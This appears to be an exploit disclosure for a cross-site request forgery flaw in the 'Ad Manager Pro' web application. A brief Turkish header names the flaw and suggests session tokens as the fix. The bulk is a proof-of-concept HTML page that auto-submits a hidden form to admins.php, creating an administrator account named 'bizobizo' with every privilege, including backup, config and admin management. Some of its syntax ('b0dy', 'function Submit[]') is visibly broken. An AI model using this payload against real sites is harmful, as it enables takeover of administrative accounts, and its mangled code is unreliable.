< ------------------- header data start ------------------- >

#############################################################

# Application Name : Ad Manager Pro

# Vulnerable Type : Cross Site Request Forgery

# Infection : Yönetici ve user sifreleri uzaktan degisilebilir.

# Bug Fix Advice : Form’a Oturum Key’i (Session Token) eklenmeli, eski sifre sorulmalidir.

# author : Bug Researchers

#############################################################

< ------------------- header data end of ------------------- >



< -- bug code start -- >

<b0dy onLoad=Submit();>
<script>function Submit[]{document.BizaRRo.submit();}</script>

<Form Action=http://www.site.com/[PATCH]/administration/admins.php method=post name=BizaRRo >
<input type=hidden name=action value=admin_created>

<input type=hidden name=username value=bizobizo >
<input type=hidden name=password value=bizobizo>
<input type=hidden name=name value=bizobizo>
<input type=hidden name=email value=[email protected]>

<input type=hidden name=rights[] value=advertisers>
<input type=hidden name=rights[] value=packages>
<input type=hidden name=rights[] value=publishers>
<input type=hidden name=rights[] value=ads>
<input type=hidden name=rights[] value=def_ads>
<input type=hidden name=rights[] value=black_zones>
<input type=hidden name=rights[] value=backup>
<input type=hidden name=rights[] value=email_u>
<input type=hidden name=rights[] value=reset>
<input type=hidden name=rights[] value=tmpl_msg>
<input type=hidden name=rights[] value=admins>
<input type=hidden name=rights[] value=config>

<input type=submit value=create name=B1>

< -- bug code end of -- >